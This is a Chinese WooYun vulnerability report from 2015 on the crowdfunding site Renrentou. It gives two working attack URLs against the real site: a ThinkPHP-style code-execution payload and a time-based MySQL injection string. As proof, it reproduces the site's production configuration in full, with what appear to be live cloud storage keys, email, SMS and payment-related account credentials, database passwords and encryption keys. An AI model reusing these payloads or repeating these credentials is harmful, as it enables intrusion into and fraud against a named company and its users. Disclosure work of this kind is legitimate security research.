当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120654

漏洞标题:人人投主站代码执行和MySQL注射

相关厂商:人人投

漏洞作者: 路人甲

提交时间:2015-06-15 17:12

修复时间:2015-07-30 17:14

公开时间:2015-07-30 17:14

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

人人投主站代码执行和MySQL注射

详细说明:

代码执行

http://www.renrentou.com/project/list/status/%24%7b%40phpinfo()%7d/sort/1/trade/0/p/2


SQL注入

http://www.renrentou.com/project/list?keyword=aaa'xor(sleep(1))or'

漏洞证明:

renrentou.png


<?php
// +----------------------------------------------------------------------
// | 线上配置
// +----------------------------------------------------------------------
return array(
'url' => array(
'www' => HTTP_PROTOCAL . 'www.renrentou.com',
'admin' => HTTP_PROTOCAL . 'admin.renrentou.com',
'user' => HTTP_PROTOCAL . 'user.renrentou.com',
'img' => HTTP_PROTOCAL . 'static.renrentou.com', //普通附件地址
'img2' => HTTP_PROTOCAL . 'img2.renrentou.com', //普通附件cdn地址
'imgpri' => HTTP_PROTOCAL . 'static2.renrentou.com', //加密附件地址
'wap' => HTTP_PROTOCAL.'wap.renrentou.com',
'api' => HTTP_PROTOCAL.'api.renrentou.com',
'app' => HTTP_PROTOCAL.'app.renrentou.com',
),

//oss附件存储
'aliyun_oss' => array(
'host' => 'oss-cn-qingdao-internal.aliyuncs.com', //青岛节点内网地址
//'host' => 'oss-cn-qingdao.aliyuncs.com', //青岛节点外网地址
'bucket' => 'renrentou',
'bucket2' => 'renrentou-private',
'access_id' => 'P3K666aaXh4R0dZi',
'access_key' => 'fEkMNNKVqQPrw2TCMVKwdP6sz7VfUK',
),

//邮件发送帐号,可以有多条。随机选择发送
'email_config' => array(
'qq' => array('host' => 'smtp.exmail.qq.com', 'port' => '25', 'username' => 'no-replay@renrentou.com.cn', 'password' => 'rrt123', 'from' => 'no-replay@renrentou.com', 'fromname' => '人人投'),
'sohu' => array('host' => 'http://sendcloud.sohu.com/webapi/mail.send.json', 'api_user' => 'renrentou', 'api_key' => 'dKWU4jWTYRj56w70', 'from' => 'service@mail.renrentou.com', 'fromname' => '人人投'),
),
//短信发送帐号配置
'sms_config' => array(
//亿美短信
'yimei' => array('url' => 'http://sdk999ws.eucp.b2m.cn:8080/sdk/SDKService', 'username' => '9SDK-EMY-0999-JDWML', 'password' => '453387','sessionkey' => '453387'),
//容联云通讯
'yuntongxun' => array('host'=>'app.cloopen.com','port'=>'8883','version'=>'2013-12-26','main_account'=>'8a48b5514a61a814014a79d945a60e43','main_token'=>'1eedf90474c149408edccb629002ab06','app_id'=>'aaf98f894a70a61d014a79daca760596'),
//漫道科技
'mdkj' => array(
'sn' => 'SDK-BBX-010-22614', ////替换成您自己的序列号
'pwd' => strtoupper(md5('SDK-BBX-010-22614' . 'D-7e55-4')), //此处密码需要加密 加密方式为 md5(sn+password) 32位大写
'mobile' => '', //手机号 多个用英文的逗号隔开 post理论没有长度限制.推荐群发一次小于等于10000个手机号
'content' => '', //iconv( "gb2312", "UTF-8//IGNORE" ,'您好测试短信[XXX公司]'),//短信内容
'ext' => '',
'stime' => '', //定时时间 格式为2011-6-29 11:09:21
'msgfmt' => '',
'rrid' => ''
),
),

/* 数据库设置 */
'sys_db_type' => 'mysql', // 数据库类型
'sys_db_host' => 'feidurds2.mysql.rds.aliyuncs.com', // 服务器地址
'sys_db_name' => 'renrentou', // 数据库名
'sys_db_user' => 'renrentou', // 用户名
'sys_db_pwd' => 'EG8x9WeDt6cO', // 密码
'sys_db_port' => 3306, // 端口

/* 数据缓存设置 */
'sys_cache_open' => true, //是否开启全局缓存 false否 true是
'sys_cache_time' => 86400, // 数据缓存有效期
'sys_cache_prefix' => 'rrt_', // 缓存前缀
'sys_cache_type' => 'redis',
'sys_redis_host' => 'server1',
'sys_redis_port' => 6379,

'sys_default_key' => 'DjjgIudnUPFY7h', // 默认可逆加密钥
'sys_platform_key' => 'DUjjg9d7DHFY7h', // 推广密钥

);
?>


/**关于支付的配置文件,请勿擅自修改**/
'pay'=>array(
'pay_off' => FALSE, //支付开关
'platformno' => '10012322542', //商户编号
'feemode' => 'PLATFORM', //PLATFORM为公司支付手续费 USER为用户支付手续费 此处为扣费模式
'idcard' => 'G2_IDCARD', //G1_IDCARD为一代身份证 G2_IDCARD为二代身份证 此处为用户身份证类型
'own_account' => 1, //用户账户类型 自己可用账户
'project_account' => 2, //用户账户类型 项目账户
'deduct_rate' => 0.05, //转账扣费费率 当前费率为5%
'verifying' => 'VERIFYING', //投资人绑定银行卡状态 认证中
'verified' => 'VERIFIED', //投资人绑定银行卡状态 已认证
'is_handle' => 1, //用户回调处理 已处理
'un_handle' => 0, //用户回调处理 未处理
'pay_action_type' =>array(
'torecharge' => 1, //接口部分动作类型 充值
'towithdraw_own' => 2, //接口部分动作类型 自身账户提现
'totransfer_project' => 3, //接口部分动作类型 项目金额提现
'freeze' => 4, //接口部分动作类型 认购 (即冻结)
'unfreeze' => 5, //接口部分动作类型 取消投标(解冻)
'loan' => 6, //接口部分动作类型 融资完成(放款)
'yeepay' => 3, //接口部分动作类型 用户是否注册易宝账户
),
'ontify' => 'notify', //服务器回调
'callback' => 'callback', //浏览器网关回调
'pay_query_status' =>array(
'recharge_record' => 'RECHARGE_RECORD', //单笔业务查询类型 充值
'repayment_record' => 'REPAYMENT_RECORD', //单笔业务查询类型 标的还款
'withdraw_record' => 'WITHDRAW_RECORD', //单笔业务查询类型 提现
'payment_record' => 'PAYMENT_RECORD', //单笔业务查询类型 标的投资放款
),
'preheat' => 2, //用户对项目的关系 约谈
'subscription' => 8, //用户对项目的关系 认购
'reservation' => 4, //用户对项目的关系 预约认购
'attention' => 1, //用户对项目的关系 关注
'freeze_status' =>array(
'orientation' => 1, //认购只开启定向众筹开关
'purchase' => 2, //认购只开启份额限购开关
'projector' => 3 //项目方打款只判定金额
)

),
/**关于支付的配置文件,请勿擅自修改**/


/* 数据库设置 */
'sys_db_type' => 'mysql', // 数据库类型
'sys_db_host' => '192.168.1.252', // 服务器地址
'sys_db_name' => 'renrentou_dev', // 数据库名
'sys_db_user' => 'root', // 用户名
'sys_db_pwd' => '123456', // 密码
'sys_db_port' => 3306, // 端口
'sys_db_prefix' => '', // 数据库表前缀

修复方案:

参数过滤,升级框架

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)